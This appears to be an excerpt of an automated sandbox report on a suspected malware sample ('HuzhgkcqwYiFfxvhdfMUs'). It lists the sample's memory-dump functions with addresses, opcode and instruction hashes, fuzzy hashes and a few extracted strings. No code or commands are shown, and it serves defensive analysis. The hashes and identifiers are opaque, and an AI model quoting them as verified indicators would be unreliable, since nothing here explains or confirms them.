                • Opcode ID: 55d00c34cdad711bfa51747f0e412b19c8bf54e54b13d73b63b8776bff879e0b
                • Instruction ID: 02f2b152621be27ba048a4bba95b2f8b5ef0f9af3d41b63e8448691a5819bb37
                • Opcode Fuzzy Hash: 55d00c34cdad711bfa51747f0e412b19c8bf54e54b13d73b63b8776bff879e0b
                • Instruction Fuzzy Hash: DE71598694F7D18BF21163BCA82D5F66FD0EF4222870882B7D18DC61DBDC18E4498BD6
                Function 00007FFAAC471D6D Relevance: .2, Instructions: 190COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 015b582fe1647e21eb40500fc0ef9e699d6953c0598cd43b23b163bdfdb4fcb4
                • Instruction ID: 868fdc94522065e0a4b4611ad5c20142d606ca1eaab384c7eabc33b41e66fde3
                • Opcode Fuzzy Hash: 015b582fe1647e21eb40500fc0ef9e699d6953c0598cd43b23b163bdfdb4fcb4
                • Instruction Fuzzy Hash: A851E631A18B598FEB48DF18C8585BA77E2FF99314B14857ED44EC3281DE34E8068BC5
                Function 00007FFAAC473265 Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae779ece63ec30ec91312772d9f2889a864c63bee63025cce83247d1e72dad74
                • Instruction ID: b7b6efbab980a77208f1a2b82ab874add34a6157b6ad7146ccbbf18ab24f3298
                • Opcode Fuzzy Hash: ae779ece63ec30ec91312772d9f2889a864c63bee63025cce83247d1e72dad74
                • Instruction Fuzzy Hash: D6513870D0961DCFEB64EB98C4586ECB7F0EF5A305F508179D00EE7292DB38A9488B84
                Function 00007FFAAC472185 Relevance: .1, Instructions: 139COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 73596d98499b95d8c82134e2eb8c47a5f9743a0b3f35df54058bb79967cc15bd
                • Instruction ID: f3359b077c3aee9206c96041aa412e6ba027442eb2ae8f8fb8e3d15a13b9cad1
                • Opcode Fuzzy Hash: 73596d98499b95d8c82134e2eb8c47a5f9743a0b3f35df54058bb79967cc15bd
                • Instruction Fuzzy Hash: 0B413931A0EA9ACFE765D778C8491B87BE0EF46304B0485BBD44DC35A2DE28E8458385
                Function 00007FFAAC47363B Relevance: .1, Instructions: 136COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4d1e085285fb5ac2cca9d60beb7b5a01bd8b16fcb301f8a2b8a35f2dce7d5df9
                • Instruction ID: a65cf4284a13a05a52bd01dea9e36534572c5e00eae06a22e4a07d27a241b263
                • Opcode Fuzzy Hash: 4d1e085285fb5ac2cca9d60beb7b5a01bd8b16fcb301f8a2b8a35f2dce7d5df9
                • Instruction Fuzzy Hash: 4F41E47191D95E8FFB94DB2CC869ABD7BE0FF5A314F048579D00EE3296CE24A8048B44
                Function 00007FFAAC47AE38 Relevance: .1, Instructions: 91COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4c340384348fc3a268d87507922727bbb8a8a84c344c1fda6dd635e37620c418
                • Instruction ID: 25d353464ea03aab4749f90441a0aef6c58d4b9dcbeed5efb7d272e116ada84e
                • Opcode Fuzzy Hash: 4c340384348fc3a268d87507922727bbb8a8a84c344c1fda6dd635e37620c418
                • Instruction Fuzzy Hash: 16318E70D9961ACFFB40EB68C84C6BE77E4EF49309F009876D40DD70A6EE34E5488680
                Function 00007FFAAC470805 Relevance: .1, Instructions: 89COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8cde780aea0dc55268f9fee8f0513365d4a5cbc3a5d71957430381983d3e055a
                • Instruction ID: ce56815a11be2ebcf35a376bdb7660c1148289d4c3983ec1c04c29739c8065ca
                • Opcode Fuzzy Hash: 8cde780aea0dc55268f9fee8f0513365d4a5cbc3a5d71957430381983d3e055a
                • Instruction Fuzzy Hash: 4121799294E6929BF350A7BCD85E2E97FD0FF12318F098477D08DC9083ED04E04982C0
                Function 00007FFAAC473470 Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21c595753e302fbb18f41282f2c157a365e48aa909794e2c311bb6d67f182fe7
                • Instruction ID: b08dd1ae7d9feb878f9b0fce71eada79a940d3f9a04126e51be48a9b629bb0a7
                • Opcode Fuzzy Hash: 21c595753e302fbb18f41282f2c157a365e48aa909794e2c311bb6d67f182fe7
                • Instruction Fuzzy Hash: C221AE3084E7DA8FE743AB78885D9A97FF4EF07314B0944EBD049CB0A3DA28A459C751
                Function 00007FFAAC470A01 Relevance: .1, Instructions: 69COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 135d0c14e2c13a125dad36ad0851847a2fb4e894b5083070f836881b568aa322
                • Instruction ID: 175091715e9f9f66de148e9e73763e717bc49750b6939e0960d5a815638f71d5
                • Opcode Fuzzy Hash: 135d0c14e2c13a125dad36ad0851847a2fb4e894b5083070f836881b568aa322
                • Instruction Fuzzy Hash: DF11B27090A65E8FFB80EB68C84D5BE7BE0FF59314F408576D81DC20A6EE34E4488780
                Function 00007FFAAC47122D Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 72deb38f6be7a59ab89aceae47922500c4d352ee602b8d43c58b054bd738ed0c
                • Instruction ID: cd1def9aaf5a9d77bd414526a9e2ca99f521ecdd37c8ab56981be1d5515909fb
                • Opcode Fuzzy Hash: 72deb38f6be7a59ab89aceae47922500c4d352ee602b8d43c58b054bd738ed0c
                • Instruction Fuzzy Hash: C411E27090A65A8FFB58DB68C45D6BA7BF0FF56315F0085BAD40ED60D1EE249444C780
                Function 00007FFAAC47382D Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 249ead6da376c759df57815d73d184eb4de88f679e122bd674f8a040d0aa5956
                • Instruction ID: edf22c4572ef867b3b2e46978c53612717dc55dba937b718613f8cd840b91852
                • Opcode Fuzzy Hash: 249ead6da376c759df57815d73d184eb4de88f679e122bd674f8a040d0aa5956
                • Instruction Fuzzy Hash: 99118EB1A4D50E8FE748DF68C8187A93BE1EB96319F5041BEC00AE32D6CBB914558B40
                Function 00007FFAAC47C8A0 Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c2221c4b12b206986d3f531bc4a1e350e72541fc4ecbc5449bbff896418721fe
                • Instruction ID: abeb93dc6fbbbdbdc72afd01c9b70840064f863ee6c7e8b6eec0d06c0c191b3b
                • Opcode Fuzzy Hash: c2221c4b12b206986d3f531bc4a1e350e72541fc4ecbc5449bbff896418721fe
                • Instruction Fuzzy Hash: FC118C7080965E8FFB88EB64C4595FA7BE0FF19309F00847AE40EC6191DE30A5548780
                Function 00007FFAAC47BB85 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 71becd3ab8b040b26ee72594c72bbbaff627f06f4fae4cb55db470d96db695f2
                • Instruction ID: 96765593913ad3a5ffea398047244d3d6efacd3faab8ee52107be324f30e579a
                • Opcode Fuzzy Hash: 71becd3ab8b040b26ee72594c72bbbaff627f06f4fae4cb55db470d96db695f2
                • Instruction Fuzzy Hash: F811C27080964D8FEB45EF24C85D5BD7FE0FF19305F0044BAD81EC6595DA34A144C740
                Function 00007FFAAC473595 Relevance: .1, Instructions: 55COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 662e375f736dc0921de2ac40fa89e9d4936041d3012e05ec9854bce3e2dbf0f3
                • Instruction ID: ccea9089241f2f3ad38d2eeeddc8a94b002360320344b9262af192318a34f1bd
                • Opcode Fuzzy Hash: 662e375f736dc0921de2ac40fa89e9d4936041d3012e05ec9854bce3e2dbf0f3
                • Instruction Fuzzy Hash: 0511CE7090964ECFEB48EF28C4595BE7BA0FF19315F0049BAD01ED2191DF34A0448740
                Function 00007FFAAC4705D8 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b0654ad847b172ae95d18aebfc21071f5faea690d76a38bd5b8d4c4cb7e52c8b
                • Instruction ID: 730218dae84f20333537389142d843cee5233764f3ad4515c8f6903187572fa4
                • Opcode Fuzzy Hash: b0654ad847b172ae95d18aebfc21071f5faea690d76a38bd5b8d4c4cb7e52c8b
                • Instruction Fuzzy Hash: 77018C3090991E8FEF88EF24C549ABA77A1EF59309F10857AD80EC2191DE35B554CB80
                Function 00007FFAAC472ED1 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86e2beb203b353af1df4c61e441b458eb8d287fce5c6fe77641038ccddf87830
                • Instruction ID: 116400999f67b9f0a44ea642f82d5661563d3cf301168ab00138791f830ac57c
                • Opcode Fuzzy Hash: 86e2beb203b353af1df4c61e441b458eb8d287fce5c6fe77641038ccddf87830
                • Instruction Fuzzy Hash: 4F018F70D1E659CFF765EB34C84D6A97BE0EF1A304F4589B6D40CC74A2EA38E1488740
                Function 00007FFAAC4728AD Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a9b9578fab4c5a6d6adabe44f52cd42209413b1ce92998b9ab360bcab55ae081
                • Instruction ID: 44c37ccda743f2df3f61d4224d50aad0adf789ff333bd10501fde85dcb3c9590
                • Opcode Fuzzy Hash: a9b9578fab4c5a6d6adabe44f52cd42209413b1ce92998b9ab360bcab55ae081
                • Instruction Fuzzy Hash: 7301B17094A64ECFF761EB34884D5B93BE4FF1A304F018AB6D40CC64A2EA34E5488780
                Function 00007FFAAC47A9B9 Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4a4679fcaf0015b63a8552a5e08199dea63964c17d24b755c4d34e45492f1c0
                • Instruction ID: 9f911cc6028f576e976dd8fba566c54e1e657e0b8d2245bee43ae0f9d54fbaa0
                • Opcode Fuzzy Hash: f4a4679fcaf0015b63a8552a5e08199dea63964c17d24b755c4d34e45492f1c0
                • Instruction Fuzzy Hash: 2A01D47084E78A8FF751EB34844D5A97BE0EF0B304F1689F2D40DC70A3EA28E4488340
                Function 00007FFAAC471CED Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6cfc03695ea5f678a770dbc0af17dc88dfa25f6c8837d66a88bbd171af3968f
                • Instruction ID: 81e3d27251846819ac47cef7788ff5f0fb8f11899b6940b7047c7b2b6582976a
                • Opcode Fuzzy Hash: d6cfc03695ea5f678a770dbc0af17dc88dfa25f6c8837d66a88bbd171af3968f
                • Instruction Fuzzy Hash: 5301D63180A78DCFEF58DF24C8195BA3BE0EF16305F40457AD80DC6191DA35E454CB80
                Function 00007FFAAC472F49 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 52a27b54b2cd6950a0dbbc396a7f1ddea07a9ca92398ad76bb164a321d115643
                • Instruction ID: 58d54084110b6f0b329ddf317eea0a32e40059e3792eb84a55b72194e1ab76fa
                • Opcode Fuzzy Hash: 52a27b54b2cd6950a0dbbc396a7f1ddea07a9ca92398ad76bb164a321d115643
                • Instruction Fuzzy Hash: 0801D43094E689CFE762A734844D6A97BE0EF56304F0589F6C40DC70A6EA28E4488341
                Function 00007FFAAC470610 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5c024fa8cb03f26b27142867ca8c8b077a3f93b31610198ef228bff54bac7ad3
                • Instruction ID: e872a5551025aac084a77f7fed478629cc0ba55d1dde01a8e4cd5dab7544af20
                • Opcode Fuzzy Hash: 5c024fa8cb03f26b27142867ca8c8b077a3f93b31610198ef228bff54bac7ad3
                • Instruction Fuzzy Hash: F2016930859A1EDBEB68EB64C0486B973A4FF1A309F11897EE40EC25E5DE36E554C640
                Function 00007FFAAC470608 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 68f7ad69bade987f37c6b6b8700fc1767c4de96387f632f59b56d222c3776625
                • Instruction ID: b370e841612130f0705d99434a7e1accd2a70ec9e4d8db7b069bb9433cb8aeaa
                • Opcode Fuzzy Hash: 68f7ad69bade987f37c6b6b8700fc1767c4de96387f632f59b56d222c3776625
                • Instruction Fuzzy Hash: A701A93080990ECBEB68EB34C44D6B973E0FF09309F10897EE40EC25D1DE3AA048C690
                Function 00007FFAAC471240 Relevance: .0, Instructions: 41COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d01bc68842620671835a22de4acb089b391176c56b8f3e352cddf5ce5c91f3e
                • Instruction ID: 519c1dea6b81df5266f7f77fa06e42ccbb4c78ae80d4e0d4cbd7c72414b9a816
                • Opcode Fuzzy Hash: 3d01bc68842620671835a22de4acb089b391176c56b8f3e352cddf5ce5c91f3e
                • Instruction Fuzzy Hash: 24F0817091A66ACBFB589B68841C7BA77F0FF56219F00857AD41ED20D1EA2451588680
                Function 00007FFAAC4705D0 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 72b2a9bb553406c1aec73e6c59386e7e8469a44afc80e3bc6fb58b508604b65f
                • Instruction ID: 9d548b3e4bf22a056483c1fa78f617e80ee0f7287c1f4b5ae4b620796712d573
                • Opcode Fuzzy Hash: 72b2a9bb553406c1aec73e6c59386e7e8469a44afc80e3bc6fb58b508604b65f
                • Instruction Fuzzy Hash: C6F0AF3084A65ECFEF84AF24D5196BA37A0EF06308F10853AE80DC2191DA35E454CB84
                Function 00007FFAAC4727C9 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7883a9f2076ef6ff7cf5cddaead146abe1073b2ad27b2793b381de53457ee1e5
                • Instruction ID: 2c4e01a023fca6bfe0831daf9a08cf6b5afd2b35b8a2d6429d12998cab67c1cd
                • Opcode Fuzzy Hash: 7883a9f2076ef6ff7cf5cddaead146abe1073b2ad27b2793b381de53457ee1e5
                • Instruction Fuzzy Hash: 5AF0C27080E789CFEB6A9B2088191B93FA0BF46205F0649BBE40AC54D2DA299458C391
                Function 00007FFAAC47B0F8 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d466f3fe3d10ed07d31cf4ad2a9c70426ab89f3e61fcb3abcd7b2369a2f9a834
                • Instruction ID: 87a3d8ae6a6738931ff0b9bd188de8f5de6fc67a5359a3669732e3d43de42569
                • Opcode Fuzzy Hash: d466f3fe3d10ed07d31cf4ad2a9c70426ab89f3e61fcb3abcd7b2369a2f9a834
                • Instruction Fuzzy Hash: 53F03C7091AA29CFFB91EB18C459BE973B0FF59304F1081A6D40ED3252DB34D9858F84
                Function 00007FFAAC47283D Relevance: .0, Instructions: 34COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86050b8ea483818cd356908b09f9bf971f8d63b68fd6a98249279caabff0b27f
                • Instruction ID: ef562ab05beb7a77e566c9b48678b4ddfbc15e798be0f1e59a8d5e72bc16bb8f
                • Opcode Fuzzy Hash: 86050b8ea483818cd356908b09f9bf971f8d63b68fd6a98249279caabff0b27f
                • Instruction Fuzzy Hash: 2CF0BB7080974ACFEB699F2484592F93BA4FF16305F41467DE40DC15D1DB39D4548680
                Function 00007FFAAC47BD74 Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 26fa9e5a597544388d00e9377674cf0477d345e141920ad6363c26b3fb63ac16
                • Instruction ID: 17574e42e1d5ecddf37acca211320e819340b826737192f075062c755bc458bf
                • Opcode Fuzzy Hash: 26fa9e5a597544388d00e9377674cf0477d345e141920ad6363c26b3fb63ac16
                • Instruction Fuzzy Hash: 77D0E831A0895DCFAF80EB88E484AECBBB0EF59302F000022E00CE2240CA20A4948B84
                Function 00007FFAAC4777C3 Relevance: .0, Instructions: 17COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2baf3565abb4795e24eb94b509b97df3b0246777df8d85d9df17d8d83c5e501d
                • Instruction ID: 62a183b24f2b29cbaa67c7f9030ca543b1a590d29fba0df52e490e36028e03a4
                • Opcode Fuzzy Hash: 2baf3565abb4795e24eb94b509b97df3b0246777df8d85d9df17d8d83c5e501d
                • Instruction Fuzzy Hash: 48E0EC70D0A92ECFEBA8DF0484547F862B5EB19315F1040B9810EE3680CE346A818B48
                Function 00007FFAAC470FC9 Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 71eaa6015225db4bb02ef264145b27deb588d5be8e316fa1ca89fcb38c7d6076
                • Instruction ID: fb14531ecbf8a7e840111f91b8264990d61c0ce7da13354952af75f01df6dd53
                • Opcode Fuzzy Hash: 71eaa6015225db4bb02ef264145b27deb588d5be8e316fa1ca89fcb38c7d6076
                • Instruction Fuzzy Hash: 73E0B660D1A41D8BFB94EB28CC48FAD6AB1AB54308F1081A5D00EE3191DE3468894F88

                Non-executed Functions

                Function 00007FFAAC47396D Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: (0,$0,^I$P/,$p0,
                • API String ID: 0-786516414
                • Opcode ID: ab7a2bd15a52f506715ba00e003ee6cbf3abbe7ae0437e4a08da65357f2c6f36
                • Instruction ID: 9e7c84f393ce2418d6889b252e75452f42c2a688b8742d1c5a87100f598927fd
                • Opcode Fuzzy Hash: ab7a2bd15a52f506715ba00e003ee6cbf3abbe7ae0437e4a08da65357f2c6f36
                • Instruction Fuzzy Hash: E721D5C391F7D28FF7168B7C181E1A46F90EF53204B4889BED0CC5A497A809E90D83C9
                Function 00007FFAAC47398D Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: (0,$0,^I$P/,$p0,
                • API String ID: 0-786516414
                • Opcode ID: dbd17d0948ab3afb2a8460f4613157b59e3719321688fd727b69f04595ef392d
                • Instruction ID: d902c2d4014b45928f94eb252cf1d1f0324a8bd4b8d8b84f97f0e73ad843ef8a
                • Opcode Fuzzy Hash: dbd17d0948ab3afb2a8460f4613157b59e3719321688fd727b69f04595ef392d
                • Instruction Fuzzy Hash: 9711EBC391F7D28FF7168B7C581E1656F90EF47604B4889BED0CC56497A819E90D83C9

                Executed Functions

                Function 00007FFAAC46F5A4 Relevance: 7.6, Strings: 6, Instructions: 72COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.1611580338.00007FFAAC46F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_21_2_7ffaac46f000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: 0$7$K$[$k$}
                • API String ID: 0-323743771
                • Opcode ID: 5fd203c1f636fd5eea085d3747d168a02a417adabd6feed8e6c93d9f8d7ed617
                • Instruction ID: 0a952b4191badba5a3d40c87ae160c06a3ca14270d4170e3df95aa2911a70a9c
                • Opcode Fuzzy Hash: 5fd203c1f636fd5eea085d3747d168a02a417adabd6feed8e6c93d9f8d7ed617
                • Instruction Fuzzy Hash: 22311970D05629CFEBA8DF10C8A87ADB7B1AB55305F1080EAD04D96294CB389AC8DF84
                Function 00007FFAAC478BFA Relevance: 4.2, Strings: 3, Instructions: 411COMMON
                Download Yara Rule
